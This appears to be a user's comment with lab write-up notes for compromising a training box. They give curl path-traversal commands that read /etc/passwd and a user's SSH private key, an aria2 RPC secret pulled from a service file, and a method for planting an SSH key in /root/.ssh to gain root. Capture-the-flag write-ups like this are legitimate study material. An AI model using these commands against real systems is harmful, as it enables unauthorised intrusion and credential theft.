WDavid404
commented
2 months ago PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) 8888/tcp open sun-answerbook? syn-ack ttl 61
8888/tcp webpage
gobuster --> no info
Search webui aria2 exploit --> Path Traversal (https://security.snyk.io/vuln/SNYK-JS-WEBUIARIA2-6322148)
Note: Vising http://192.168.247.100:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd on web broswer doesn't work: it will return 404 error.
curl --path-as-is http://192.168.247.100:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd
-->
-->
deathflash user
curl --path-as-is http://192.168.247.100:8888/../../../../../../../../../../../../../../../../../../../../home/deathflash/.ssh/id_rsa
-->
Got private key info. Save it as id_rsa
ssh -i id_rsa_pg deathflash@192.168.247.100
--> login succeed.
[PE]
linpeas
--》
0.0.0.0:6800
find / -iname aria2* -type f 2>/dev/null
cat /etc/systemd/system/aria2.service
--》rpc-secret=mEHNghqcNiF3KV
setup ligolo-ng tunnel, then
Visiting 240.0.0.1:8888
Input secret and add our IP as download URL
--》
we can see the rev.sh is downloaded to the target host's /tmp
--> rev.sh has root permission and we cannot run it (permission denied)
instead, we can upload a ssh pub key (file name: authorized_keys) to /root/.ssh in the same way and then ssh login as root user.
Keypoints:
find / -iname aria2* -type f 2>/dev/null--> find a config file that contains secret info